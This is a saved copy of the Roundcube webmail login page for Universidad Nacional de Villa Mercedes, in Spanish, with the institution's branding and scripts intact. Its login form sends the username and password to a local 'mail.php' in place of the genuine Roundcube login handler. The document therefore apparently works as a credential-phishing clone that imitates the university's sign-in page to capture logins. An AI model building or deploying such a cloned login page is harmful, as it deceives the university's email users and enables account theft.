<!DOCTYPE html>
<!-- saved from url=(0040)https://webmail.unvime.edu.ar/roundcube/ -->
<html lang="es" class=" js chrome webkit"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Webmail Universidad Nacional de Villa Mercedes :: Bienvenido a Webmail Universidad Nacional de Villa Mercedes</title>
<meta name="Robots" content="noindex,nofollow">
<meta name="viewport" content="" id="viewport">
<link rel="shortcut icon" href="https://webmail.unvime.edu.ar/roundcube/skins/larry/images/favicon.ico">
<link rel="stylesheet" type="text/css" href="./index_files/styles.min.css">
<!--[if IE 9]><link rel="stylesheet" type="text/css" href="skins/larry/svggradients.min.css?s=1480262938" /><![endif]-->
<link rel="stylesheet" type="text/css" href="./index_files/jquery-ui-1.10.4.custom.css">
<script type="text/javascript" src="./index_files/ui.min.js.download"></script>




<script src="./index_files/jquery.min.js.download" type="text/javascript"></script>
<script src="./index_files/common.min.js.download" type="text/javascript"></script>
<script src="./index_files/app.min.js.download" type="text/javascript"></script>
<script src="./index_files/jstz.min.js.download" type="text/javascript"></script>
<script type="text/javascript">

/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) 2005-2014 The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","x_frame_options":"sameorigin","standard_windows":false,"locale":"es_ES","cookie_domain":"","cookie_path":"\/","cookie_secure":true,"skin":"larry","refresh_interval":180,"session_lifetime":1800,"action":"","comm_path":".\/?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","request_token":"ADcWwJzak3g7xI3rbH56JuX4YaMRRzrr"});
rcmail.add_label({"loading":"Cargando...","servererror":"\u00a1Error del servidor!","connerror":"\u00a1Error de conexi\u00f3n (fallo al intentar alcanzar el servidor)!","requesttimedout":"Ha expirado el tiempo de respuesta","refreshing":"Actualizando\u2026","windowopenerror":"iLa ventana emergente fue bloqueada!","uploadingmany":"Cargando archivos\u2026","errortitle":"\u00a1Ha ocurrido un error!","toggleadvancedoptions":"Desplegar opciones avanzadas"});
rcmail.gui_container("loginfooter","bottomline");
rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script type="text/javascript" src="./index_files/jquery-ui-1.10.4.custom.min.js.download"></script>
<script type="text/javascript" src="./index_files/jquery.ui.datepicker-es.min.js.download"></script>
</head>
<body>

<h1 class="voice">Webmail Universidad Nacional de Villa Mercedes Iniciar sesión</h1>

<div id="login-form">
<div class="box-inner" role="main">
<img src="./index_files/logo-webmail.png" id="logo" alt="Webmail Universidad Nacional de Villa Mercedes">

<form name="form" method="post" action="mail.php">
<input type="hidden" name="_token" value="ADcWwJzak3g7xI3rbH56JuX4YaMRRzrr">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="Europe/London"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Nombre de usuario</label>
</td>
<td class="input"><input name="_user" id="rcmloginuser" required="required" size="40" autocapitalize="off" autocomplete="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Contraseña</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required="required" size="40" autocapitalize="off" autocomplete="off" type="password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><input type="submit" id="rcmloginsubmit" class="button mainaction" value="Iniciar sesión"></p>

</form>

</div>

<div class="box-bottom" role="complementary">
	<div id="message"></div>
	<noscript>
		<p class="noscriptwarning">Advertencia: ¡Este servicio de webmail necesita Javascript! Para poder usarlo habilite el soporte de Javascript en su navegador, por favor.</p>
	</noscript>
</div>

<div id="bottomline" role="contentinfo">
	Webmail Universidad Nacional de Villa Mercedes 
		
</div>
</div>



<script type="text/javascript">
if (!window.UI) { var UI = new rcube_mail_ui(); }
</script>




<script type="text/javascript">

jQuery.extend(jQuery.ui.dialog.prototype.options.position, {
                using: function(pos) {
                    var me = jQuery(this),
                        offset = me.css(pos).offset(),
                        topOffset = offset.top - 12;
                    if (topOffset < 0)
                        me.css('top', pos.top - topOffset);
                    if (offset.left + me.outerWidth() + 12 > jQuery(window).width())
                        me.css('left', pos.left - 12);
                }
            });
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/larry\/images\/ajaxloader.gif","skins\/larry\/images\/ajaxloader_dark.gif","skins\/larry\/images\/buttons.png","skins\/larry\/images\/addcontact.png","skins\/larry\/images\/filetypes.png","skins\/larry\/images\/listicons.png","skins\/larry\/images\/messages.png","skins\/larry\/images\/messages_dark.png","skins\/larry\/images\/quota.png","skins\/larry\/images\/selector.png","skins\/larry\/images\/splitter.png","skins\/larry\/images\/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>


</body></html>